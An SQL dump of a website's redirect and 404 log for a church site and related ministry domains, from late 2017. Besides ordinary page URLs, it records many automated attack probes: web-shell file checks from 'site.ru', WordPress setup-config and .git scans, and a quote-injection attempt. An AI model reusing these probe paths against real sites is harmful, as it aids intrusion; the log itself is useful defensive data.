(7042, 'https://www.lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/seminar', NULL, '', '', 6, 0, '2017-10-27 01:22:48', '0000-00-00 00:00:00', 301),
(7043, 'https://lifeoasisinternationalchurch.org/devotional/', NULL, '', '', 10, 0, '2017-10-27 09:16:05', '0000-00-00 00:00:00', 301),
(7044, 'https://lifeoasisinternationalchurch.org/medias.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-10-27 10:16:50', '0000-00-00 00:00:00', 301),
(7045, 'https://lifeoasisinternationalchurch.org/admin_index.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-10-27 10:20:12', '0000-00-00 00:00:00', 301),
(7046, 'https://lifeoasisinternationalchurch.org/2-video', NULL, '', '', 10, 0, '2017-10-27 12:53:47', '0000-00-00 00:00:00', 301),
(7047, 'https://www.lifeoasisinternationalchurch.org/loicforum', NULL, '', '', 19, 0, '2017-10-28 01:43:33', '0000-00-00 00:00:00', 301),
(7048, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/apply', NULL, '', '', 1, 0, '2017-10-28 14:31:34', '0000-00-00 00:00:00', 301),
(7049, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/policy', NULL, '', '', 1, 0, '2017-10-28 14:37:51', '0000-00-00 00:00:00', 301),
(7050, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/reporting', NULL, '', '', 1, 0, '2017-10-28 14:39:25', '0000-00-00 00:00:00', 301),
(7051, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/boarding-requirements', NULL, '', '', 1, 0, '2017-10-28 14:39:30', '0000-00-00 00:00:00', 301),
(7052, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/parents-teachers-forum', NULL, '', '', 1, 0, '2017-10-28 14:39:45', '0000-00-00 00:00:00', 301),
(7053, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/extra-curricula-activities', NULL, '', '', 1, 0, '2017-10-28 14:45:48', '0000-00-00 00:00:00', 301),
(7054, 'https://www.lifeoasisinternationalchurch.org/gobc2009/index.html', NULL, '', '', 5, 0, '2017-10-28 15:57:44', '0000-00-00 00:00:00', 301),
(7055, 'https://www.lifeoasisinternationalchurch.org/letter', NULL, '', '', 20, 0, '2017-10-28 20:57:20', '0000-00-00 00:00:00', 301),
(7056, 'https://www.lifeoasisinternationalchurch.org/template-info/wimmp', NULL, '', '', 5, 0, '2017-10-29 01:01:40', '0000-00-00 00:00:00', 301),
(7057, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/music', NULL, '', '', 5, 0, '2017-10-29 01:08:13', '0000-00-00 00:00:00', 301),
(7058, 'https://lifeoasisinternationalchurch.org/resources/streaming2', NULL, '', '', 8, 0, '2017-10-29 01:34:42', '0000-00-00 00:00:00', 301),
(7059, 'https://lifeoasisinternationalchurch.org/resources/streaming2/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-10-29 01:41:56', '0000-00-00 00:00:00', 301),
(7060, 'https://lifeoasisinternationalchurch.org/index.php/programme/16-fp-tabs', NULL, '', '', 1, 0, '2017-10-29 04:02:30', '0000-00-00 00:00:00', 301),
(7061, 'https://lifeoasisinternationalchurch.org/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-10-29 04:08:21', '0000-00-00 00:00:00', 301),
(7062, 'https://lifeoasisinternationalchurch.org/11-demo-articles/53-testing', NULL, '', '', 10, 0, '2017-10-29 06:31:34', '0000-00-00 00:00:00', 301),
(7063, 'https://lifeoasisinternationalchurch.org/index.php/programme/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-10-29 06:38:02', '0000-00-00 00:00:00', 301),
(7064, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief', NULL, '', '', 9, 0, '2017-10-29 08:02:22', '0000-00-00 00:00:00', 301),
(7065, 'https://lifeoasisinternationalchurch.org/live-stream', NULL, '', '', 3, 0, '2017-10-29 11:25:21', '0000-00-00 00:00:00', 301),
(7066, 'https://lifeoasisinternationalchurch.org/wow2017/index.php', NULL, '', '', 10, 0, '2017-10-29 12:01:02', '0000-00-00 00:00:00', 301),
(7067, 'https://lifeoasisinternationalchurch.org/wow2017/index.php/component/users/?view=remind', NULL, '', '', 4, 0, '2017-10-29 12:01:05', '0000-00-00 00:00:00', 301),
(7068, 'https://lifeoasisinternationalchurch.org/wow2017/index.php/component/users/?view=reset', NULL, '', '', 2, 0, '2017-10-29 12:01:07', '0000-00-00 00:00:00', 301),
(7069, 'https://www.lifeoasisinternationalchurch.org/videos', NULL, '', '', 89, 0, '2017-10-29 12:09:14', '0000-00-00 00:00:00', 301),
(7070, 'https://lifeoasisinternationalchurch.org/plugins/vmpayment/klikandpay/klikandpay/assets/js/htaccess.php', NULL, 'http://site.ru', '', 1, 0, '2017-10-29 13:43:51', '0000-00-00 00:00:00', 301),
(7071, 'https://lifeoasisinternationalchurch.org/language/en-gb/wp-class.php', NULL, 'http://site.ru', '', 2, 0, '2017-10-29 16:38:46', '0000-00-00 00:00:00', 301),
(7072, 'https://lifeoasisinternationalchurch.org/pqcsfx3h.php', NULL, 'http://site.ru', '', 5, 0, '2017-10-30 02:30:01', '0000-00-00 00:00:00', 301),
(7073, 'https://lifeoasisinternationalchurch.org/layouts/joomla/lwbzqzc.php', NULL, 'http://site.ru', '', 2, 0, '2017-10-30 04:07:54', '0000-00-00 00:00:00', 301),
(7074, 'https://lifeoasisinternationalchurch.org/proekt/logo_img.php', NULL, 'http://site.ru', '', 2, 0, '2017-10-30 07:59:56', '0000-00-00 00:00:00', 301),
(7075, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons?sermon_cat=21', NULL, '', '', 6, 0, '2017-10-30 11:46:25', '0000-00-00 00:00:00', 301),
(7076, 'https://solaareogunministires.org/beta/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:22', '0000-00-00 00:00:00', 301),
(7077, 'https://solaareogunministires.org/blogs/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:22', '0000-00-00 00:00:00', 301),
(7078, 'https://solaareogunministires.org/blog/wordpress/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:22', '0000-00-00 00:00:00', 301),
(7079, 'https://solaareogunministires.org/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:22', '0000-00-00 00:00:00', 301),
(7080, 'https://solaareogunministires.org/site/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:23', '0000-00-00 00:00:00', 301),
(7081, 'https://solaareogunministires.org/cms/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:23', '0000-00-00 00:00:00', 301),
(7082, 'https://shop.lifeoasisinternationalchurch.org/blogs/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:24', '0000-00-00 00:00:00', 301),
(7083, 'https://shop.lifeoasisinternationalchurch.org/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:24', '0000-00-00 00:00:00', 301),
(7084, 'https://shop.lifeoasisinternationalchurch.org/cms/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:24', '0000-00-00 00:00:00', 301),
(7085, 'https://shop.lifeoasisinternationalchurch.org/beta/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:25', '0000-00-00 00:00:00', 301),
(7086, 'https://shop.lifeoasisinternationalchurch.org/blog/wordpress/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:25', '0000-00-00 00:00:00', 301),
(7087, 'https://shop.lifeoasisinternationalchurch.org/site/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-30 12:42:25', '0000-00-00 00:00:00', 301),
(7088, 'https://www.lifeoasisinternationalchurch.org/loic/programmes.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/programmes.php', '', 15, 0, '2017-10-30 13:42:20', '0000-00-00 00:00:00', 301),
(7089, 'https://lifeoasisinternationalchurch.org/media/mzumyol.php', NULL, 'http://site.ru', '', 1, 0, '2017-10-30 20:11:09', '0000-00-00 00:00:00', 301),
(7090, 'https://www.lifeoasisinternationalchurch.org/prayer/103-prayer-focus-for-day-12', NULL, '', '', 4, 0, '2017-10-30 20:30:46', '0000-00-00 00:00:00', 301),
(7091, 'https://lifeoasisinternationalchurch.org/language/system_infos.php', NULL, 'http://site.ru', '', 6, 0, '2017-10-30 22:33:08', '0000-00-00 00:00:00', 301),
(7092, 'https://lifeoasisinternationalchurch.org/mambots/system/config.php', NULL, 'http://site.ru', '', 1, 0, '2017-10-30 22:44:33', '0000-00-00 00:00:00', 301),
(7093, 'https://www.lifeoasisinternationalchurch.org/loic/events.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/events.php', '', 10, 0, '2017-10-30 22:51:14', '0000-00-00 00:00:00', 301),
(7094, 'https://lifeoasisinternationalchurch.org/index.php/template-info/mimmp', NULL, '', '', 13, 0, '2017-10-30 23:58:22', '0000-00-00 00:00:00', 301),
(7095, 'https://lifeoasisinternationalchurch.org/cli/oirdpux.php', NULL, 'http://site.ru', '', 1, 0, '2017-10-31 03:49:45', '0000-00-00 00:00:00', 301),
(7096, 'https://www.lifeoasisinternationalchurch.org/images/books/unmasking', NULL, '', '', 11, 0, '2017-10-31 07:22:29', '0000-00-00 00:00:00', 301),
(7097, 'https://www.lifeoasisinternationalchurch.org/loic/gobc.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/gobc.php', '', 5, 0, '2017-10-31 09:41:36', '0000-00-00 00:00:00', 301),
(7098, 'https://lifeoasisinternationalchurch.org/logs/avprvmx.php', NULL, 'http://site.ru', '', 2, 0, '2017-10-31 10:55:27', '0000-00-00 00:00:00', 301),
(7099, 'https://lifeoasisinternationalchurch.org/sec.php', NULL, 'http://site.ru', '', 7, 0, '2017-10-31 11:55:30', '0000-00-00 00:00:00', 301),
(7100, 'https://lifeoasisinternationalchurch.org/00.php', NULL, 'http://site.ru', '', 4, 0, '2017-10-31 12:07:39', '0000-00-00 00:00:00', 301),
(7101, 'https://www.lifeoasisinternationalchurch.org/prophetic.html', NULL, '', '', 16, 0, '2017-10-31 13:50:37', '0000-00-00 00:00:00', 301),
(7102, 'https://142.4.21.132/.git/head', NULL, '', '', 1, 0, '2017-10-31 14:40:01', '0000-00-00 00:00:00', 301),
(7103, 'https://142.4.21.132/sra_{ba195980-cd49-458b-9e23-c84ee0adcd75}/', NULL, '', '', 1, 0, '2017-10-31 14:40:03', '0000-00-00 00:00:00', 301),
(7104, 'https://www.lifeoasisinternationalchurch.org/iphttps', NULL, '', '', 1, 0, '2017-10-31 14:40:03', '0000-00-00 00:00:00', 301),
(7105, 'https://lifeoasisinternationalchurch.org/media/jui/img/bixck.php', NULL, 'http://site.ru', '', 1, 0, '2017-10-31 23:01:00', '0000-00-00 00:00:00', 301),
(7106, 'https://www.lifeoasisinternationalchurch.org/simmp', NULL, '', '', 19, 0, '2017-11-01 03:29:54', '0000-00-00 00:00:00', 301),
(7107, 'https://142.4.21.132/w3wpdiag/?cid=f2949bab-240a-46ca-a455-6f504367ba7d', NULL, '', '', 1, 0, '2017-11-01 03:50:58', '0000-00-00 00:00:00', 301),
(7108, 'https://lifeoasisinternationalchurch.org/inc.php', NULL, 'http://site.ru', '', 7, 0, '2017-11-01 07:32:46', '0000-00-00 00:00:00', 301),
(7109, 'https://lifeoasisinternationalchurch.org/contact.php', NULL, '', '', 8, 0, '2017-11-01 07:51:24', '0000-00-00 00:00:00', 301),
(7110, 'https://lifeoasisinternationalchurch.org/info.php', NULL, 'http://site.ru', '', 15, 0, '2017-11-01 08:14:41', '0000-00-00 00:00:00', 301),
(7111, 'https://lifeoasisinternationalchurch.org/bin/ijwbyy.php', NULL, 'http://site.ru', '', 2, 0, '2017-11-01 09:09:55', '0000-00-00 00:00:00', 301),
(7112, 'https://lifeoasisinternationalchurch.org/authorize.php', NULL, 'http://site.ru', '', 10, 0, '2017-11-01 13:20:07', '0000-00-00 00:00:00', 301),
(7113, 'https://lifeoasisinternationalchurch.org/utility/convert/index.php', NULL, '', '', 50, 0, '2017-11-01 13:27:04', '0000-00-00 00:00:00', 301),
(7114, 'https://lifeoasisinternationalchurch.org/vmfilesinvoices/orajy.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-01 15:31:25', '0000-00-00 00:00:00', 301),
(7115, 'https://lifeoasisinternationalchurch.org/tmp/i.php', NULL, 'http://site.ru', '', 2, 0, '2017-11-01 15:45:00', '0000-00-00 00:00:00', 301),
(7116, 'https://www.lifeoasisinternationalchurch.org/utility/convert/index.php', NULL, '', '', 20, 0, '2017-11-01 16:18:17', '0000-00-00 00:00:00', 301),
(7117, 'https://www.lifeoasisinternationalchurch.org/resources/vod\'a=0', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/vod\'A=0', '', 1, 0, '2017-11-01 16:20:16', '0000-00-00 00:00:00', 301),
(7118, 'https://lifeoasisinternationalchurch.org/streamingsearch.heasyspeedtest.co/?uc=20170623&ap=appfocus1&source=display-googledisplay&uid=1d155e1e-caae-40c4-9efe-400f1cbb82d8&i_id=speedtest_3.2&page=newtab&', NULL, '', '', 1, 0, '2017-11-01 16:23:58', '0000-00-00 00:00:00', 301),
(7119, 'https://www.lifeoasisinternationalchurch.org/live stream', NULL, '', '', 1, 0, '2017-11-01 17:15:00', '0000-00-00 00:00:00', 301),
(7120, 'https://lifeoasisinternationalchurch.org/default.php', NULL, 'http://site.ru', '', 5, 0, '2017-11-01 18:13:24', '0000-00-00 00:00:00', 301),
(7121, 'https://lifeoasisinternationalchurch.org/language/zh-cn/logo_img.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-01 19:41:39', '0000-00-00 00:00:00', 301),
(7122, 'https://shop.lifeoasisinternationalchurch.org/wow2017/', NULL, '', '', 1, 0, '2017-11-01 20:29:53', '0000-00-00 00:00:00', 301),
(7123, 'https://lifeoasisinternationalchurch.org/language/en-gb/indix.php', NULL, 'http://site.ru', '', 9, 0, '2017-11-01 21:29:49', '0000-00-00 00:00:00', 301),
(7124, 'https://lifeoasisinternationalchurch.org/18-loic/35-trm', NULL, '', '', 13, 0, '2017-11-01 21:31:17', '0000-00-00 00:00:00', 301),
(7125, 'https://lifeoasisinternationalchurch.org/upholsterynet.com/logo_img.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-01 22:06:28', '0000-00-00 00:00:00', 301),
(7126, 'https://www.lifeoasisinternationalchurch.org/loic-forum', NULL, '', '', 9, 0, '2017-11-02 01:02:37', '0000-00-00 00:00:00', 301),
(7127, 'https://lifeoasisinternationalchurch.org/deadjoe', NULL, '', '', 2, 0, '2017-11-02 05:02:59', '0000-00-00 00:00:00', 301),
(7128, 'https://www.lifeoasisinternationalchurch.org/deadjoe', NULL, '', '', 2, 0, '2017-11-02 05:03:00', '0000-00-00 00:00:00', 301),
(7129, 'https://lifeoasisinternationalchurch.org/wow2017/index.php/accommodation', NULL, '', '', 4, 0, '2017-11-02 07:33:43', '0000-00-00 00:00:00', 301),
(7130, 'https://142.4.21.132/w3wpdiag/?cid=f2949bab-240a-a455-46ca-6f504367ba7d', NULL, '', '', 1, 0, '2017-11-02 07:42:52', '0000-00-00 00:00:00', 301),
(7131, 'https://lifeoasisinternationalchurch.org/htaccess.php', NULL, 'http://site.ru', '', 14, 0, '2017-11-02 11:06:35', '0000-00-00 00:00:00', 301),
(7132, 'https://lifeoasisinternationalchurch.org/media/gzovt.php', NULL, 'http://site.ru', '', 2, 0, '2017-11-02 12:09:51', '0000-00-00 00:00:00', 301),
(7133, 'https://lifeoasisinternationalchurch.org/framework.php', NULL, 'http://site.ru', '', 4, 0, '2017-11-02 12:22:36', '0000-00-00 00:00:00', 301),
(7134, 'https://lifeoasisinternationalchurch.org/jemobile.php', NULL, 'http://site.ru', '', 5, 0, '2017-11-02 14:07:04', '0000-00-00 00:00:00', 301),
(7135, 'https://www.lifeoasisinternationalchurch.org/web mail', NULL, '', '', 24, 0, '2017-11-02 16:38:24', '0000-00-00 00:00:00', 301),
(7136, 'https://lifeoasisinternationalchurch.org/estore', NULL, '', '', 7, 0, '2017-11-02 23:01:33', '0000-00-00 00:00:00', 301),
(7137, 'https://lifeoasisinternationalchurch.org/libraries/legacy/log/js.php', NULL, 'http://site.ru', '', 6, 0, '2017-11-02 23:26:20', '0000-00-00 00:00:00', 301),
(7138, 'https://lifeoasisinternationalchurch.org/parseopml/popup-pomo.php', NULL, 'http://site.ru', '', 10, 0, '2017-11-03 01:17:40', '0000-00-00 00:00:00', 301),
(7139, 'https://lifeoasisinternationalchurch.org/sellerolux_407775878.php', NULL, 'http://site.ru', '', 2, 0, '2017-11-03 02:54:45', '0000-00-00 00:00:00', 301),
(7140, 'https://lifeoasisinternationalchurch.org/kis_cup_c6fa3ed5-6d17-47d1-b6e2-f4b02cc905e0/1509224076', NULL, '', '', 2, 0, '2017-11-03 05:19:47', '0000-00-00 00:00:00', 301),
(7141, 'https://lifeoasisinternationalchurch.org/straming', NULL, '', '', 9, 0, '2017-11-03 05:42:38', '0000-00-00 00:00:00', 301),
(7142, 'https://lifeoasisinternationalchurch.org/media/hyuzt.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-03 07:04:42', '0000-00-00 00:00:00', 301),
(7143, 'https://lifeoasisinternationalchurch.org/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 2, 0, '2017-11-03 08:12:27', '0000-00-00 00:00:00', 301),
(7144, 'https://www.lifeoasisinternationalchurch.org/protocol.html', NULL, '', '', 16, 0, '2017-11-03 10:41:59', '0000-00-00 00:00:00', 301),
(7145, 'https://lifeoasisinternationalchurch.org/media/reviews/photos/original/68/33/f3/degesx.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-03 15:56:35', '0000-00-00 00:00:00', 301),
(7146, 'https://www.lifeoasisinternationalchurch.org/8-2017', NULL, '', '', 1, 0, '2017-11-03 17:07:03', '0000-00-00 00:00:00', 301),
(7147, 'https://lifeoasisinternationalchurch.org/faith.html', NULL, '', '', 20, 0, '2017-11-03 20:21:40', '0000-00-00 00:00:00', 301),
(7148, 'https://lifeoasisinternationalchurch.org/language/zh-cn/403.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-03 20:38:34', '0000-00-00 00:00:00', 301),
(7149, 'https://lifeoasisinternationalchurch.org/logs/pthtq.php', NULL, 'http://site.ru', '', 2, 0, '2017-11-04 00:11:31', '0000-00-00 00:00:00', 301),
(7150, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/63-disclaimer', NULL, '', '', 22, 0, '2017-11-04 00:39:07', '0000-00-00 00:00:00', 301),
(7151, 'https://lifeoasisinternationalchurch.org/js.php', NULL, 'http://site.ru', '', 4, 0, '2017-11-04 04:06:54', '0000-00-00 00:00:00', 301),
(7152, 'https://lifeoasisinternationalchurch.org/language/ttsobh.php', NULL, 'http://site.ru', '', 3, 0, '2017-11-04 05:41:33', '0000-00-00 00:00:00', 301),
(7153, 'https://lifeoasisinternationalchurch.org/trainning', NULL, '', '', 6, 0, '2017-11-04 10:03:06', '0000-00-00 00:00:00', 301),
(7154, 'https://www.lifeoasisinternationalchurch.org/trainingq', NULL, '', '', 1, 0, '2017-11-04 10:06:36', '0000-00-00 00:00:00', 301),
(7155, 'https://lifeoasisinternationalchurch.org/bin/pfbbb.php', NULL, 'http://site.ru', '', 1, 0, '2017-11-04 16:15:31', '0000-00-00 00:00:00', 301),
(7156, 'https://www.lifeoasisinternationalchurch.org/pastors', NULL, '', '', 1, 0, '2017-11-04 20:54:46', '0000-00-00 00:00:00', 301),
(7157, 'https://www.spiritmeat.net/blog/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-11-05 05:11:43', '0000-00-00 00:00:00', 301),
(7158, 'https://www.spiritmeat.net/wp/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-11-05 05:11:43', '0000-00-00 00:00:00', 301),
(7159, 'https://www.spiritmeat.net/old/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-11-05 05:11:43', '0000-00-00 00:00:00', 301),
(7160, 'https://www.spiritmeat.net/test/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-11-05 05:11:44', '0000-00-00 00:00:00', 301),
(7161, 'https://lifeoasisinternationalchurch.org/livestraeming', NULL, '', '', 1, 0, '2017-11-05 06:49:20', '0000-00-00 00:00:00', 301),
(7162, 'https://www.lifeoasisinternationalchurch.org/2011-08-10-21-22-58', NULL, '', '', 17, 0, '2017-11-05 16:31:15', '0000-00-00 00:00:00', 301),
(7163, 'https://www.lifeoasisinternationalchurch.org/gallery', NULL, '', '', 12, 0, '2017-11-05 16:35:51', '0000-00-00 00:00:00', 301),
(7164, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 7, 0, '2017-11-05 16:38:47', '0000-00-00 00:00:00', 301),
(7165, 'https://www.lifeoasisinternationalchurch.org/wow2017/index.php/accommodation', NULL, '', '', 88, 0, '2017-11-05 22:01:13', '0000-00-00 00:00:00', 301),
(7166, 'https://www.lifeoasisinternationalchurch.org/template-info/gin/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-11-05 23:20:38', '0000-00-00 00:00:00', 301),
(7167, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun', NULL, '', '', 5, 0, '2017-11-06 04:05:35', '0000-00-00 00:00:00', 301),
(7168, 'https://www.lifeoasisinternationalchurch.org/dreamcentre.html', NULL, '', '', 15, 0, '2017-11-06 06:21:55', '0000-00-00 00:00:00', 301),
(7169, 'https://142.4.21.132/xxbb', NULL, '', '', 11, 0, '2017-11-06 13:08:39', '0000-00-00 00:00:00', 301),
(7170, 'https://lifeoasisinternationalchurch.org/about.html', NULL, '', '', 24, 0, '2017-11-06 19:19:22', '0000-00-00 00:00:00', 301),
(7171, 'https://lifeoasisinternationalchurch.org/magazine', NULL, '', '', 7, 0, '2017-11-07 13:22:41', '0000-00-00 00:00:00', 301),
(7172, 'https://lifeoasisinternationalchurch.org/resouces/livestreaming', NULL, '', '', 3, 0, '2017-11-07 15:51:17', '0000-00-00 00:00:00', 301),
(7173, 'https://lifeoasisinternationalchurch.org/resouces/live.php', NULL, '', '', 2, 0, '2017-11-07 16:12:44', '0000-00-00 00:00:00', 301),
(7174, 'https://lifeoasisinternationalchurch.org/vision.html', NULL, '', '', 13, 0, '2017-11-07 16:44:00', '0000-00-00 00:00:00', 301),
(7175, 'https://www.lifeoasisinternationalchurch.org/youtub', NULL, '', '', 1, 0, '2017-11-07 16:54:37', '0000-00-00 00:00:00', 301),
(7176, 'https://www.lifeoasisinternationalchurch.org/template-info/outreach', NULL, '', '', 10, 0, '2017-11-07 18:37:03', '0000-00-00 00:00:00', 301),
(7177, 'https://lifeoasisinternationalchurch.org/index.php/template-info/gin', NULL, 'http://lifeoasisinternationalchurch.org/index.php/template-info/gin', '', 3, 0, '2017-11-07 18:38:18', '0000-00-00 00:00:00', 301),
(7178, 'https://lifeoasisinternationalchurch.org/2-uncategorised/58-private', NULL, '', '', 11, 0, '2017-11-08 03:14:49', '0000-00-00 00:00:00', 301),
(7179, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 6, 0, '2017-11-08 05:08:06', '0000-00-00 00:00:00', 301),
(7180, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/10-preset-styles', NULL, '', '', 20, 0, '2017-11-08 05:28:16', '0000-00-00 00:00:00', 301),
(7181, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/15-sample-content-4?tmpl=component&print=1&page=', NULL, '', '', 2, 0, '2017-11-08 05:58:16', '0000-00-00 00:00:00', 301),
(7182, 'https://lifeoasisinternationalchurch.org/12-sample-content/', NULL, '', '', 2, 0, '2017-11-08 09:06:52', '0000-00-00 00:00:00', 301),
(7183, 'https://www.lifeoasisinternationalchurch.org/about.php', NULL, '', '', 22, 0, '2017-11-08 20:51:58', '0000-00-00 00:00:00', 301),
(7184, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/10-preset-styles?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-11-09 03:15:59', '0000-00-00 00:00:00', 301),
(7185, 'https://lifeoasisinternationalchurch.org/index.php/destinyinternationalcollege/index.php/forum/welcome-mat/177-gmina-djsimo-enorgullec', NULL, 'https://lifeoasisinternationalchurch.org/index.php/destinyinternationalcollege/index.php/forum/welcome-mat/177-gmina-djsimo-enorgullec', '', 2, 0, '2017-11-09 03:42:08', '0000-00-00 00:00:00', 301),
(7186, 'https://lifeoasisinternationalchurch.org/index.php/destinyinternationalcollege/index.php', NULL, 'https://lifeoasisinternationalchurch.org/index.php/destinyinternationalcollege/index.php', '', 2, 0, '2017-11-09 03:42:10', '0000-00-00 00:00:00', 301),
(7187, 'https://www.lifeoasisinternationalchurch.org/18-prayer-a-fasting-day', NULL, '', '', 21, 0, '2017-11-09 14:58:21', '0000-00-00 00:00:00', 301),
(7188, 'https://www.lifeoasisinternationalchurch.org/index1.html', NULL, '', '', 3, 0, '2017-11-09 16:31:05', '0000-00-00 00:00:00', 301),
(7189, 'https://lifeoasisinternationalchurch.org/livestreming', NULL, '', '', 3, 0, '2017-11-09 17:20:00', '0000-00-00 00:00:00', 301),
(7190, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0', NULL, '', '', 21, 0, '2017-11-09 18:29:20', '0000-00-00 00:00:00', 301),
(7191, 'https://www.lifeoasisinternationalchurch.org/protocol.php', NULL, '', '', 5, 0, '2017-11-09 21:29:58', '0000-00-00 00:00:00', 301),
(7192, 'https://lifeoasisinternationalchurch.org/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-11-10 19:45:27', '0000-00-00 00:00:00', 301),
(7193, 'https://lifeoasisinternationalchurch.org/node/459/track', NULL, '', '', 1, 0, '2017-11-11 01:24:43', '0000-00-00 00:00:00', 301),
(7194, 'https://lifeoasisinternationalchurch.org/div', NULL, '', '', 7, 0, '2017-11-11 02:39:11', '0000-00-00 00:00:00', 301),
(7195, 'https://www.lifeoasisinternationalchurch.org/ining', NULL, '', '', 6, 0, '2017-11-11 06:11:53', '0000-00-00 00:00:00', 301),
(7196, 'https://lifeoasisinternationalchurch.org/adminstrator', NULL, '', '', 1, 0, '2017-11-11 10:03:37', '0000-00-00 00:00:00', 301),
(7197, 'https://www.lifeoasisinternationalchurch.org/33-prayer-a-fasting-day-24', NULL, '', '', 11, 0, '2017-11-11 18:33:20', '0000-00-00 00:00:00', 301),
(7198, 'https://142.4.21.132/stssys.htm', NULL, '', '', 1, 0, '2017-11-11 20:23:43', '0000-00-00 00:00:00', 301),
(7199, 'https://www.lifeoasisinternationalchurch.org/privatestream', NULL, '', '', 4, 0, '2017-11-11 20:28:14', '0000-00-00 00:00:00', 301),
(7200, 'https://www.lifeoasisinternationalchurch.org/plus/flink.php?dopost=save', NULL, '', '', 4, 0, '2017-11-11 22:54:12', '0000-00-00 00:00:00', 301),
(7201, 'https://lifeoasisinternationalchurch.org/lifestreem', NULL, '', '', 1, 0, '2017-11-11 22:58:40', '0000-00-00 00:00:00', 301),
(7202, 'https://www.lifeoasisinternationalchurch.org/privateg', NULL, '', '', 3, 0, '2017-11-11 23:20:17', '0000-00-00 00:00:00', 301),
(7203, 'https://lifeoasisinternationalchurch.org/60-day8', NULL, '', '', 2, 0, '2017-11-12 06:55:18', '0000-00-00 00:00:00', 301),
(7204, 'https://www.lifeoasisinternationalchurch.org/destinytv', NULL, '', '', 3, 0, '2017-11-12 10:40:50', '0000-00-00 00:00:00', 301),
(7205, 'https://www.lifeoasisinternationalchurch.org/livestrng', NULL, '', '', 1, 0, '2017-11-12 11:35:05', '0000-00-00 00:00:00', 301),
(7206, 'https://www.lifeoasisinternationalchurch.org/livesg', NULL, '', '', 2, 0, '2017-11-12 11:35:20', '0000-00-00 00:00:00', 301),
(7207, 'https://lifeoasisinternationalchurch.org/12-sample-content/17-sample-content-6', NULL, '', '', 2, 0, '2017-11-12 21:28:13', '0000-00-00 00:00:00', 301),
(7208, 'https://www.lifeoasisinternationalchurch.org/ministry.html', NULL, '', '', 11, 0, '2017-11-13 01:35:37', '0000-00-00 00:00:00', 301),
(7209, 'https://www.lifeoasisinternationalchurch.org/loic/abundantlifehouse.php', NULL, '', '', 12, 0, '2017-11-13 07:11:16', '0000-00-00 00:00:00', 301),
(7210, 'https://www.lifeoasisinternationalchurch.org/thronemusic/', NULL, '', '', 30, 0, '2017-11-13 20:10:53', '0000-00-00 00:00:00', 301),
(7211, 'https://www.lifeoasisinternationalchurch.org/35-prayer-a-fasting-day-26', NULL, '', '', 10, 0, '2017-11-13 23:24:37', '0000-00-00 00:00:00', 301),
(7212, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 7, 0, '2017-11-13 23:56:45', '0000-00-00 00:00:00', 301),
(7213, 'https://lifeoasisinternationalchurch.org/node/3/track', NULL, '', '', 1, 0, '2017-11-14 00:32:17', '0000-00-00 00:00:00', 301),
(7214, 'https://lifeoasisinternationalchurch.org/get:http://lifeoasisinternationalchurch.org/destinyinternationalcollege/index.php/forum/indexhttp code: 200', NULL, 'GET:http://lifeoasisinternationalchurch.org/GET:http://lifeoasisinternationalchurch.org/destinyinternationalcollege/index.php/forum/indexhttp%20code:%20200http code: 301', '', 17, 0, '2017-11-14 03:08:04', '0000-00-00 00:00:00', 301),
